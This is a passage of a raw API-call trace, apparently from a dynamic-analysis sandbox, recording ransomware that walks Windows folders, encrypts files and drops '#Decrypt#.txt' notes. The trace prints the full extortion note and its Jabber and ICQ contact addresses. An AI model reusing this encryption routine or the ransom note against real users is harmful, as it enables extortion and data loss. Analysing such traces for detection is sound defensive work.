wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*") returned 56 [0228.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0229.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.009] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\.") returned 56 [0229.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.032] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0229.032] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.032] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\..") returned 57 [0229.032] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.033] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0229.033] lstrcmpiW (lpString1="Alphabet.xml", lpString2="Windows") returned -1 [0229.033] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 67 [0229.033] StrStrIW (lpFirst="Alphabet.xml", lpSrch=".horseleader") returned 0x0 [0229.033] lstrcmpW (lpString1="Alphabet.xml", lpString2="#Decrypt#.txt") returned 1 [0229.033] lstrcmpW (lpString1="Alphabet.xml", lpString2="_uninstalling_.png") returned 1 [0229.033] lstrlenW (lpString=".testttjffg") returned 11 [0229.033] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpSrch=".testttjffg") returned 0x0 [0229.033] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0229.033] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0229.033] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.067] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0229.067] lstrcmpiW (lpString1="ar-SA", lpString2="Windows") returned -1 [0229.067] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 60 [0229.067] lstrcmpW (lpString1="ar-SA", lpString2=".") returned 1 [0229.067] lstrcmpW (lpString1="ar-SA", lpString2="..") returned 1 [0229.067] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.067] GetProcessHeap () returned 0x780000 [0229.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.067] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*") returned 62 [0229.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.077] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\.") returned 62 [0229.078] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.079] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.079] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.079] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\..") returned 63 [0229.090] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.090] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.090] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.090] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.090] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 76 [0229.090] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.090] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.090] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.092] lstrlenW (lpString=".testttjffg") returned 11 [0229.092] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.092] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.092] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.110] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.112] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.123] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\#Decrypt#.txt") returned 74 [0229.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.126] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.126] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.128] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.128] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.128] CloseHandle (hObject=0x158) returned 1 [0229.128] GetProcessHeap () returned 0x780000 [0229.128] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.129] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0229.129] lstrcmpiW (lpString1="bg-BG", lpString2="Windows") returned -1 [0229.129] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 60 [0229.129] lstrcmpW (lpString1="bg-BG", lpString2=".") returned 1 [0229.129] lstrcmpW (lpString1="bg-BG", lpString2="..") returned 1 [0229.129] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.129] GetProcessHeap () returned 0x780000 [0229.129] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.129] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*") returned 62 [0229.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.130] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.130] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\.") returned 62 [0229.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.130] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.130] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.130] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\..") returned 63 [0229.131] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.131] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.131] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.131] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.131] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 76 [0229.134] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.134] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.134] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.134] lstrlenW (lpString=".testttjffg") returned 11 [0229.135] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.135] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.135] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.135] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.135] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.136] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\#Decrypt#.txt") returned 74 [0229.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.136] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.136] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.138] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.138] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.138] CloseHandle (hObject=0x158) returned 1 [0229.138] GetProcessHeap () returned 0x780000 [0229.138] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.139] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0229.139] lstrcmpiW (lpString1="Content.xml", lpString2="Windows") returned -1 [0229.139] wnsprintfW (in: 